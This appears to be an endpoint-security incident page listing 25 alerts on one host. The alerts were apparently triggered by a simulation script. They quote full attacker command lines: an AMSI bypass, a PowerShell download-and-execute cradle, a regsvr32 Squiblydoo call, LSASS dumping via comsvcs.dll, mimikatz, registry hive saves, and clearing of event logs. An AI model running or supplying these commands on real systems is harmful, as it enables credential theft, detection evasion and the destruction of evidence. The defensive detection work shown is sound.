Back to list

Critical CINC-20251221-5F0B9576 new

Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:9133821177

Incident Overview

Incident ID CINC-20251221-5F0B9576
Severity Critical (90)
Status new
Alert Count 25
Host Count 1

Timeline

First Seen 2025-12-22 04:05:35
Last Seen 2025-12-22 04:07:48
Duration 0d 0h 2m
Created 2025-12-22 08:36
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Defense Evasion AI Powered IOA Execution Credential Access Persistence
Techniques:
Indicator Removal Command and Scripting Interpreter User Execution OS Credential Dumping Event Triggered Execution PowerShell Regsvr32 Rundll32

Affected Hosts (1)

TEAHEE

Related Alerts (25)

Severity Status Hostname Description Tactic Command Line Time
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 04:07
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 04:07
High new TEAHEE A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 04:07
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 04:06
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 04:06
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv 12-22 04:06
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv 12-22 04:06
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 04:06
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 04:06
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 04:06
High new TEAHEE A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 04:06
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 04:06
High new TEAHEE A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 04:06
High new TEAHEE A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 04:06
High new TEAHEE A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. Execution powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 04:06
High new TEAHEE A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. Execution C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" 12-22 04:06
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 04:06
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 04:06
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 04:06
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-22 04:06
High new TEAHEE A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further. Credential Access C:\WINDOWS\system32\cmd.exe /c "powershell sekurlsa::logonpasswords" 12-22 04:06
High new TEAHEE Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full 12-22 04:06
Critical new TEAHEE A process appears to be accessing credentials and might be dumping passwords. If this is unexpected, review the process tree. Credential Access rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full 12-22 04:06
High new TEAHEE Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full" 12-22 04:06
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 04:05